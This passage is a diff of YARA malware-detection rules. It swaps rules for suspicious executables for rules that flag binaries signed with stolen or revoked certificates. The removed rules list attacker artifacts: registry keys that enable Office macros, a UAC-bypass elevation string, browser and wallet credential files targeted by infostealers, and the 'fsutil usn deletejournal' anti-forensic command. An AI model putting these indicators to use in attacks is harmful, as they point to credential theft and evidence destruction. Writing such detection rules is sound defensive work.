 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L79-L88"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5513-L5524"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9b9e2789bee4f3b54384dabde028a7b6e70b3e0d66090d5141145a72df515db4"
-		score = 40
-		quality = 41
+		logic_hash = "071895cc37527aa634410dc79bf1656068e4c2b9f61d24912160c5f847e154f9"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "e4362228dd69c25c1d4ba528549fa00845a8dc24"
 		importance = 20
 
-	strings:
-		$s1 = "\\Enviroment\\windir" ascii wide nocase
-		$s2 = "\\system32\\cleanmgr.exe" ascii wide nocase
-
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TestCert" and pe.signatures [ i ] . serial == "1a:fd:14:91:d5:2f:89:ba:41:fa:6c:02:81:bb:97:16" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Enable_Officemacro : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_719Ac44966D05762Ef95245Eefcf3046 : FILE
 {
 	meta:
-		description = "Detects Windows executables referencing Office macro registry keys. Observed modifying Office configurations via the registy to enable macros"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2cd26bc8-33c7-5628-982f-dc59ce158082"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "e215971c-67f0-5fdb-9525-7aef2559674f"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L90-L108"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5526-L5537"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "18f66cff1fe2ab32366bf385bfe08f4895071c83e26812709eeb334857754c0f"
-		score = 40
-		quality = 39
+		logic_hash = "2b7c5ccc7a09d3917cf8625bc3e78526ba9620eb8bb08490124c24a5c2eda629"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "57ecdfa48ed03a5a8177887090b3d1ffaf124846"
 		importance = 20
 
-	strings:
-		$s1 = "\\Word\\Security\\VBAWarnings" ascii wide
-		$s2 = "\\PowerPoint\\Security\\VBAWarnings" ascii wide
-		$s3 = "\\Excel\\Security\\VBAWarnings" ascii wide
-		$h1 = "5c576f72645c53656375726974795c5642415761726e696e6773" nocase ascii wide
-		$h2 = "5c506f776572506f696e745c53656375726974795c5642415761726e696e6773" nocase ascii wide
-		$h3 = "5c5c457863656c5c5c53656375726974795c5c5642415761726e696e6773" nocase ascii wide
-		$d1 = "5c%57%6f%72%64%5c%53%65%63%75%72%69%74%79%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii
-		$d2 = "5c%50%6f%77%65%72%50%6f%69%6e%74%5c%53%65%63%75%72%69%74%79%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii
-		$d3 = "5c%5c%45%78%63%65%6c%5c%5c%53%65%63%75%72%69%74%79%5c%5c%56%42%41%57%61%72%6e%69%6e%67%73" nocase ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or 2 of ( $h* ) or 2 of ( $d* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "jZQtQDMvyDRzWsoVFeitFmeNcWMtKauvidXSUrSEwqmi" and pe.signatures [ i ] . serial == "71:9a:c4:49:66:d0:57:62:ef:95:24:5e:ef:cf:30:46" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Disable_Officeprotectedview : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_008Fe807310D98357A59382090634B93F0 : FILE
 {
 	meta:
-		description = "Detects Windows executables referencing Office ProtectedView registry keys. Observed modifying Office configurations via the registy to disable ProtectedView"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "fed81219-d141-5fbf-a7b6-518e3d4de6f6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "bf4326b3-a838-5dff-a6e1-ac71c6fb871d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L110-L128"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5539-L5550"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14b2c19ec1f1ade9285f9e73a8779865c1e09d5ad1df2e0469b5f4a5eb278110"
-		score = 40
-		quality = 39
+		logic_hash = "a90430a6f07f67ead37e5cba9f0baee92551511a9f33a2a1fd3d2419322aaa8b"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "acd6cf38d03c355ddb84b96a7365bfc1738a0ec5"
 		importance = 20
 
-	strings:
-		$s1 = "\\Security\\ProtectedView\\DisableInternetFilesInPV" ascii wide
-		$s2 = "\\Security\\ProtectedView\\DisableAttachementsInPV" ascii wide
-		$s3 = "\\Security\\ProtectedView\\DisableUnsafeLocationsInPV" ascii wide
-		$h1 = "5c53656375726974795c50726f746563746564566965775c44697361626c65496e7465726e657446696c6573496e5056" nocase ascii wide
-		$h2 = "5c53656375726974795c50726f746563746564566965775c44697361626c65417474616368656d656e7473496e5056" nocase ascii wide
-		$h3 = "5c53656375726974795c50726f746563746564566965775c44697361626c65556e736166654c6f636174696f6e73496e5056" nocase ascii wide
-		$d1 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%49%6e%74%65%72%6e%65%74%46%69%6c%65%73%49%6e%50%56" nocase ascii
-		$d2 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%41%74%74%61%63%68%65%6d%65%6e%74%73%49%6e%50%56" nocase ascii
-		$d3 = "5c%53%65%63%75%72%69%74%79%5c%50%72%6f%74%65%63%74%65%64%56%69%65%77%5c%44%69%73%61%62%6c%65%55%6e%73%61%66%65%4c%6f%63%61%74%69%6f%6e%73%49%6e%50%56" nocase ascii
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $s* ) or 2 of ( $h* ) or 2 of ( $d* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Sandboxproductid : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00801689896Ed339237464A41A2900A969 : FILE
 {
 	meta:
-		description = "Detects binaries and memory artifacts referencing sandbox product IDs"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5af0ace7-6ffb-5695-94c5-d8172d326662"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "91cecd18-0007-59a4-94f3-bdaa06b25822"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L130-L149"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5552-L5563"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a047ef7e70956e1c2222bde47036d7fff6d98cd8a5df81ea85584a3b5006d4a"
-		score = 40
-		quality = 45
+		logic_hash = "9dc505e00e0085587aee2bf2e70db04850e11d057b8d16e31e8caebb130e047b"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "9b0ab2e7f3514f6372d14b1f7f963c155b18bd24"
 		importance = 20
 
-	strings:
-		$id1 = "76487-337-8429955-22614" fullword ascii wide
-		$id2 = "76487-644-3177037-23510" fullword ascii wide
-		$id3 = "55274-640-2673064-23950" fullword ascii wide
-		$id4 = "76487-640-1457236-23837" fullword ascii wide
-		$id5 = "76497-640-6308873-23835" fullword ascii wide
-		$id6 = "76487-640-1464517-23259" fullword ascii wide
-		$id7 = "76487 - 337 - 8429955 - 22614" fullword ascii wide
-		$id8 = "76487 - 644 - 3177037 - 23510" fullword ascii wide
-		$id9 = "55274 - 640 - 2673064 - 23950" fullword ascii wide
-		$id10 = "76487 - 640 - 1457236 - 23837" fullword ascii wide
-		$id11 = "76497 - 640 - 6308873 - 23835" fullword ascii wide
-		$id12 = "76487 - 640 - 1464517 - 23259" fullword ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_AHK_Downloader : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_Podangers : FILE
 {
 	meta:
-		description = "Detects AutoHotKey binaries acting as second stage droppers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ac8320ed-a9e1-5660-a50f-ec010ac162a6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "b394c4a1-1614-578f-bbfc-6eb9998b4a06"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L184-L196"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5565-L5576"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8806d8c03adb4ea4cd9b806f8f8c21e561b39b5602c70d09ed193e35e1502d35"
-		score = 40
-		quality = 20
+		logic_hash = "6a041e8ae4a7a1af59b81799b5c014691e347c8305266adeffd9d49337712b2e"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "6e757c3b91d75d58b5230c27a2fcc01bfe5fe60f"
 		importance = 20
 
-	strings:
-		$d1 = "URLDownloadToFile, http" ascii
-		$d2 = "URLDownloadToFile, file" ascii
-		$s1 = ">AUTOHOTKEY SCRIPT<" fullword wide
-		$s2 = "open \"%s\" alias AHK_PlayMe" fullword wide
-		$s3 = /AHK\s(Keybd|Mouse)/ fullword wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $d* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PODANGERS" and pe.signatures [ i ] . serial == "00" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Uacbypass_CMSTPCOM : T1218 FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00E9A1E07314Bc2F2D51818454B63E5829 : FILE
 {
 	meta:
-		description = "Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cdcf6e29-6ee7-5ac7-bd52-c8d42f3f8bf6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "2c9f0497-0fcd-591c-be72-e92464b689f3"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L198-L213"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5578-L5589"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d198db97901475c0dd10603875fc339d8a7c6d40c7f9c22cda31bb0b1d6d0f2a"
-		score = 40
-		quality = 39
-		tags = "T1218, FILE"
+		logic_hash = "e3dfb75350bcdbb6861612f2f6cc757724260f99e4024df2b20c7b273bc50266"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		thumbprint = "3a146f3c0fc17b9df14bd127ebf12b15a5a1a011"
 		importance = 20
 
-	strings:
-		$guid1 = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" ascii wide nocase
-		$guid2 = "{3E000D72-A845-4CD9-BD83-80C07C3B881F}" ascii wide nocase
-		$guid3 = "{BA126F01-2166-11D1-B1D0-00805FC1270E}" ascii wide nocase
-		$s1 = "CoGetObject" fullword ascii wide
-		$s2 = "Elevation:Administrator!new:" fullword ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $guid* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "iWLiYpLtpOlZYGmysAZkhz" and pe.signatures [ i ] . serial == "00:e9:a1:e0:73:14:bc:2f:2d:51:81:84:54:b6:3e:58:29" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_9D915138Acdac1A044Afa6E5D99567C5 : FILE
 {
 	meta:
-		description = "Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "07223564-bf4f-5fcd-ad3d-b67eb3baea8e"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "89182dfb-b100-573c-85ae-38bdf7f24a64"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L345-L359"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5591-L5602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5350f79b01e8e8ae9e0607aa02965cd9ccc52c59a901abcb51e401476cb0fa3a"
-		score = 40
-		quality = 31
+		logic_hash = "32fb0d12a9b61461104e29571fcc7210f7ea8a82a8e240c747a0070d8d43a9b0"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "4f8b9ce0e25810d1b62d8c016607de128beba2a1"
 		importance = 20
 
-	strings:
-		$s1 = "key3.db" nocase ascii wide
-		$s2 = "key4.db" nocase ascii wide
-		$s3 = "cert8.db" nocase ascii wide
-		$s4 = "logins.json" nocase ascii wide
-		$s5 = "account.cfn" nocase ascii wide
-		$s6 = "wand.dat" nocase ascii wide
-		$s7 = "wallet.dat" nocase ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AAAruntest" and pe.signatures [ i ] . serial == "9d:91:51:38:ac:da:c1:a0:44:af:a6:e5:d9:95:67:c5" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_11A9Bf6B2Dcbc683475B431A1C79133E : FILE
 {
 	meta:
-		description = "Detects executables referencing many file transfer clients. Observed in information stealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0967c8d6-fc80-5341-9974-c6f16f024c2c"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "9c49f529-330f-5d37-b613-e45aad50afcb"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L418-L472"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5604-L5615"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "49daece8c3da43b3dba26ab6f71fa5c27d3a6ab2c0427b3d2613c1feb25458de"
-		score = 40
-		quality = 20
+		logic_hash = "fa424180e60d2fde2fce085d0c848c5b33bcc58c2ca54f327f446ff5cf361fe2"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "7412b3f5ba689967a5b46e6ef5dc5e9b9de3917d"
 		importance = 20
 
-	strings:
-		$s1 = "FileZilla\\recentservers.xml" ascii wide
-		$s2 = "Ipswitch\\WS_FTP\\" ascii wide
-		$s3 = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions" ascii wide
-		$s4 = "SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions" ascii wide
-		$s5 = "CoreFTP\\sites" ascii wide
-		$s6 = "FTPWare\\COREFTP\\Sites" ascii wide
-		$s7 = "HKEY_CURRENT_USERSoftwareFTPWareCOREFTPSites" ascii wide
-		$s8 = "FTP Navigator\\Ftplist.txt" ascii wide
-		$s9 = "FlashFXP\\3quick.dat" ascii wide
-		$s10 = "SmartFTP\\" ascii wide
-		$s11 = "cftp\\Ftplist.txt" ascii wide
-		$s12 = "Software\\DownloadManager\\Passwords\\" ascii wide
-		$s13 = "jDownloader\\config\\database.script" ascii wide
-		$s14 = "FileZilla\\sitemanager.xml" ascii wide
-		$s15 = "Far Manager\\Profile\\PluginsData\\" ascii wide
-		$s16 = "FTPGetter\\Profile\\servers.xml" ascii wide
-		$s17 = "FTPGetter\\servers.xml" ascii wide
-		$s18 = "Estsoft\\ALFTP\\" ascii wide
-		$s19 = "Far\\Plugins\\FTP\\" ascii wide
-		$s20 = "Far2\\Plugins\\FTP\\" ascii wide
-		$s21 = "Ghisler\\Total Commander" ascii wide
-		$s22 = "LinasFTP\\Site Manager" ascii wide
-		$s23 = "CuteFTP\\sm.dat" ascii wide
-		$s24 = "FlashFXP\\4\\Sites.dat" ascii wide
-		$s25 = "FlashFXP\\3\\Sites.dat" ascii wide
-		$s26 = "VanDyke\\Config\\Sessions\\" ascii wide
-		$s27 = "FTP Explorer\\" ascii wide
-		$s28 = "TurboFTP\\" ascii wide
-		$s29 = "FTPRush\\" ascii wide
-		$s30 = "LeapWare\\LeapFTP\\" ascii wide
-		$s31 = "FTPGetter\\" ascii wide
-		$s32 = "Far\\SavedDialogHistory\\" ascii wide
-		$s33 = "Far2\\SavedDialogHistory\\" ascii wide
-		$s34 = "GlobalSCAPE\\CuteFTP " ascii wide
-		$s35 = "Ghisler\\Windows Commander" ascii wide
-		$s36 = "BPFTP\\Bullet Proof FTP\\" ascii wide
-		$s37 = "Sota\\FFFTP" ascii wide
-		$s38 = "FTPClient\\Sites" ascii wide
-		$s39 = "SOFTWARE\\Robo-FTP 3.7\\" ascii wide
-		$s40 = "MAS-Soft\\FTPInfo\\" ascii wide
-		$s41 = "SoftX.org\\FTPClient\\Sites" ascii wide
-		$s42 = "BulletProof Software\\BulletProof FTP Client\\" ascii wide
-		$s43 = "BitKinex\\bitkinex.ds" ascii wide
-		$s44 = "Frigate3\\FtpSite.XML" ascii wide
-		$s45 = "Directory Opus\\ConfigFiles" ascii wide
-		$s56 = "SoftX.org\\FTPClient\\Sites" ascii wide
-		$s57 = "South River Technologies\\WebDrive\\Connections" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BINDOX" and pe.signatures [ i ] . serial == "11:a9:bf:6b:2d:cb:c6:83:47:5b:43:1a:1c:79:13:3e" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Usndeletejournal : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_3Fd3661533Eef209153C9Afec3Ba4D8A : FILE
 {
 	meta:
-		description = "Detects executables containing anti-forensic artifacts of deleting USN change journal. Observed in ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "eafc7ed9-d0e7-562d-8215-6f3feddee27a"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "d47bc223-f29e-54d3-a452-064f89fa80f7"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L612-L628"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5617-L5628"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1920fc2bc8c3628016bb91403960f5fbb101b5822f553c1f28d9502841a9832c"
-		score = 40
-		quality = 35
+		logic_hash = "e9662abf4c70d54fc719850ef216352fd59a559726fbad5db9e265660400b432"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "20ddd23f53e1ac49926335ec3e685a515ab49252"
 		importance = 20
 
-	strings:
-		$cmd1 = "fsutil.exe" ascii wide nocase
-		$s1 = "usn deletejournal /D C:" ascii wide nocase
-		$s2 = "fsutil.exe usn deletejournal" ascii wide nocase
-		$s3 = "fsutil usn deletejournal" ascii wide nocase
-		$s4 = "fsutil file setZeroData offset=0" ascii wide nocase
-		$ne1 = "fsutil usn readdata C:\\Temp\\sample.txt" wide
-		$ne2 = "fsutil transaction query {0f2d8905-6153-449a-8e03-7d3a38187ba1}" wide
-		$ne3 = "fsutil resource start d:\\foobar d:\\foobar\\LogDir\\LogBLF::TxfLog d:\\foobar\\LogDir\\LogBLF::TmLog" wide
-		$ne4 = "fsutil objectid query C:\\Temp\\sample.txt" wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( not any of ( $ne* ) and ( ( 1 of ( $cmd* ) and 1 of ( $s* ) ) or 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_Geninfostealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2Ba40F65086686Dd4Ab7171E : FILE
 {
 	meta:
-		description = "Detects executables containing common artifacts observed in infostealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "531d8f7f-dee5-5d05-9293-f1ab5d5ac780"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "13909741-cba3-5143-86eb-bcc227cfaa9c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L630-L657"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5630-L5641"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f9e6f6b470e010d362db55fcf563f85a3a408ef8331c04a157f2676442b63b1a"
-		score = 40
-		quality = 31
+		logic_hash = "8ed65c0b5d231be9dbbe34da493087d1bf83cf21c401435fed7e2851acdb6f60"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "842f81869c2f4f2ba2a7e6513501166e2679108a"
 		importance = 20
 
-	strings:
-		$f1 = "FileZilla\\recentservers.xml" ascii wide
-		$f2 = "FileZilla\\sitemanager.xml" ascii wide
-		$f3 = "SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions" ascii wide
-		$b1 = "Chrome\\User Data\\" ascii wide
-		$b2 = "Mozilla\\Firefox\\Profiles" ascii wide
-		$b3 = "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2" ascii wide
-		$b4 = "Opera Software\\Opera Stable\\Login Data" ascii wide
-		$b5 = "YandexBrowser\\User Data\\" ascii wide
-		$s1 = "key3.db" nocase ascii wide
-		$s2 = "key4.db" nocase ascii wide
-		$s3 = "cert8.db" nocase ascii wide
-		$s4 = "logins.json" nocase ascii wide
-		$s5 = "account.cfn" nocase ascii wide
-		$s6 = "wand.dat" nocase ascii wide
-		$s7 = "wallet.dat" nocase ascii wide
-		$a1 = "username_value" ascii wide
-		$a2 = "password_value" ascii wide
-		$a3 = "encryptedUsername" ascii wide
-		$a4 = "encryptedPassword" ascii wide
-		$a5 = "httpRealm" ascii wide
-
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $f* ) and 2 of ( $b* ) and 1 of ( $s* ) and 3 of ( $a* ) ) or ( 14 of them ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SISTEMS LLC" and pe.signatures [ i ] . serial == "2b:a4:0f:65:08:66:86:dd:4a:b7:17:1e" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_PWSH_Asciiencoding_Pattern : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_67144B9Ed89Fb2D106D0233873C6E35F : FILE
 {
 	meta:
-		description = "Detects PowerShell scripts containing ASCII encoded files"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df96d801-1a14-58af-b245-3a4a6ccf22c6"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "f9806e55-9efa-504a-b27c-d3418fc5cd38"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L710-L724"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5643-L5654"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "037ce50a6c6d2bf25163e658c5a8c18950715a52fcdf47162fcd288306acbf9c"
-		score = 40
-		quality = 45
+		logic_hash = "9d3c39c590a75b3ea1d1f699bea279c0c68498e51e2ab7f4ad3e3f8857d6d668"
+		score = 75
+		quality = 75
 		tags = "FILE"
+		thumbprint = "5971faead4c86bf72e6ab36efc0376d4abfffeda"
 		importance = 20
 
-	strings:
-		$enc1 = "[char[]]([char]97..[char]122)" ascii
-		$enc2 = "[char[]]([char]65..[char]90)" ascii
-		$s1 = ".DownloadData($" ascii
-		$s2 = "[Net.SecurityProtocolType]::TLS12" ascii
-		$s3 = "::WriteAllBytes($" ascii
-		$s4 = "::FromBase64String($" ascii
-		$s5 = "Get-Random" ascii
-
 	condition:
-		1 of ( $enc* ) and 4 of ( $s* ) and filesize < 2500KB
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infosignal LLC" and pe.signatures [ i ] . serial == "67:14:4b:9e:d8:9f:b2:d1:06:d0:23:38:73:c6:e3:5f" )
 }
-rule DITEKSHEN_INDICATOR_SUSPICIOUS_JS_Hex_B64Encoded_EXE : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ca4822E6905Aa4Fca9E28523F04F14A3 : FILE
 {
 	meta:
-		description = "Detects JavaScript files hex and base64 encoded executables"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "37516c6b-0a77-5a20-a36f-5f8309b37362"
-		date = "2024-06-08"
-		modified = "2024-06-08"
+		id = "713f84b3-b09a-5fcf-85ed-899be9f14b84"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L726-L740"
